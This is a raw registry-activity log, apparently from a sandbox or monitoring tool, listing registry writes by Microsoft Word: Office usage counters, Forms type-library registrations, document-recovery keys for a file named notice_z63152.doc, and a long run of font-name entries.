HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

1332215876

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

1332215875

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

1332215876

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1332215912

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1332215913

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10070400000000000F01FEC\Usage

SpellingAndGrammarFiles_1031

1332215827

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10070400000000000F01FEC\Usage

SpellingAndGrammarFiles_1031

1332215828

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1332215914

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1332215915

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1332215916

2644

WINWORD.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

1332215917

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

8uc

38756300540A00000600000001000000F600000002000000E60000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C006D006900630072006F0073006F00660074005C00770069006E0064006F00770073005C00740065006D0070006F007200610072007900200069006E007400650072006E00650074002000660069006C00650073005C0063006F006E00740065006E0074002E006F00750074006C006F006F006B005C003200320066006D0067006C00650065005C006E006F0074006900630065005F007A00360033003100350032002E0064006F006300000000000000

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\TypeLib\{580F4B29-3BB7-48C4-A1BA-0F83D6355AAC}\2.0

Microsoft Forms 2.0 Object Library

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\TypeLib\{580F4B29-3BB7-48C4-A1BA-0F83D6355AAC}\2.0\FLAGS

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\TypeLib\{580F4B29-3BB7-48C4-A1BA-0F83D6355AAC}\2.0\0\win32

C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\TypeLib\{580F4B29-3BB7-48C4-A1BA-0F83D6355AAC}\2.0\HELPDIR

C:\Users\admin\AppData\Local\Temp\Word8.0

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}

Font

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}

IDataAutoWrapper

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}

IReturnInteger

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}

IReturnBoolean

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}

IReturnString

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}

IReturnSingle

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}

IReturnEffect

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}

IControl

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}

Controls

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}

IOptionFrame

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}

_UserForm

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}

ControlEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}

FormEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}

OptionFrameEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}

ILabelControl

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}

ICommandButton

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}

IMdcText

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}

IMdcList

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}

IMdcCombo

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}

IMdcCheckBox

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}

IMdcOptionButton

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}

IMdcToggleButton

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}

IScrollbar

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}

Tab

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}

Tabs

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}

ITabStrip

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}

ISpinbutton

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{4C599243-6926-101B-9992-00000B65C6F9}

IImage

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLSubmitButton

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLImage

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLReset

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLCheckbox

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLOption

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLText

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLHidden

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLPassword

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLSelect

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}

IWHTMLTextArea

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}

LabelControlEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}

CommandButtonEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}

MdcTextEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}

MdcListEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}

MdcComboEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}

MdcCheckBoxEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}

MdcOptionButtonEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}

MdcToggleButtonEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}

ScrollbarEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}

TabStripEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}

SpinbuttonEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}

ImageEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}

WHTMLControlEvents

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents1

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents2

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents3

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents4

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents5

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents6

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents7

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents9

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}

WHTMLControlEvents10

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}

IPage

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}

Pages

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}

IMultiPage

2644

WINWORD.EXE

write

HKEY_CLASSES_ROOT\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}

MultiPageEvents

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\39E8A6

39E8A6

04000000540A00007200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C004D006900630072006F0073006F00660074005C00570069006E0064006F00770073005C00540065006D0070006F007200610072007900200049006E007400650072006E00650074002000460069006C00650073005C0043006F006E00740065006E0074002E004F00750074006C006F006F006B005C003200320046004D0047004C00450045005C004E004F0054004900430045005F005A00360033003100350032002E0064006F006300110000004E004F0054004900430045005F005A00360033003100350032002E0064006F00630000000000010000000000000034452D6D3D96D501A6E83900A6E8390000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF

2644

WINWORD.EXE

delete key

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\39D53D

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Ami R

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Arial Unicode MS

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Batang

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@BatangChe

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@DFKai-SB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Dotum

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@DotumChe

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Expo M

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@FangSong

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Gulim

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@GulimChe

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Gungsuh

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@GungsuhChe

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Headline R

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGGothicE

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGGothicM

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGGyoshotai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGKyokashotai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGMaruGothicMPRO

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGMinchoB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGMinchoE

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPGothicE

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPGothicM

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPGyoshotai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPKyokashotai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPMinchoB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPMinchoE

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPSoeiKakugothicUB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPSoeiKakupoptai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPSoeiPresenceEB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSeikaishotaiPRO

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSGothicE

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSGothicM

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSGyoshotai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSKyokashotai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSMinchoB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSMinchoE

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSoeiKakugothicUB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSoeiKakupoptai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSoeiPresenceEB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSSoeiKakugothicUB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSSoeiKakupoptai

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSSoeiPresenceEB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYGothic-Extra

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYGothic-Medium

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYGraphic-Medium

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYGungSo-Bold

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYHeadLine-Medium

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYMyeongJo-Extra

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYPMokGak-Bold

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYPost-Light

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYPost-Medium

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYShortSamul-Medium

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYSinMyeongJo-Medium

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@KaiTi

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Magic R

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Malgun Gothic

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Meiryo

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Meiryo UI

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Microsoft JhengHei

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Microsoft YaHei

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MingLiU

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MingLiU_HKSCS

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MingLiU_HKSCS-ExtB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MingLiU-ExtB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MoeumT R

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MS Gothic

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MS Mincho

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MS PGothic

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MS PMincho

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MS UI Gothic

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@New Gulim

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@NSimSun

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@PMingLiU

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@PMingLiU-ExtB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Pyunji R

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@SimHei

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@SimSun

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@SimSun-ExtB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Yet R

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Agency FB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Aharoni

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Algerian

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Ami R

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Andalus

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Angsana New

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

AngsanaUPC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Aparajita

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Arabic Typesetting

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Arial

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Arial Black

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Arial Narrow

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Arial Rounded MT Bold

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Arial Unicode MS

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Baskerville Old Face

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Batang

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

BatangChe

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bauhaus 93

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bell MT

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Berlin Sans FB

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Berlin Sans FB Demi

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bernard MT Condensed

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Blackadder ITC

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bodoni MT

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bodoni MT Black

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bodoni MT Condensed

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bodoni MT Poster Compressed

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Book Antiqua

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bookman Old Style

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bookshelf Symbol 7

2644

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bradley Hand ITC

2644

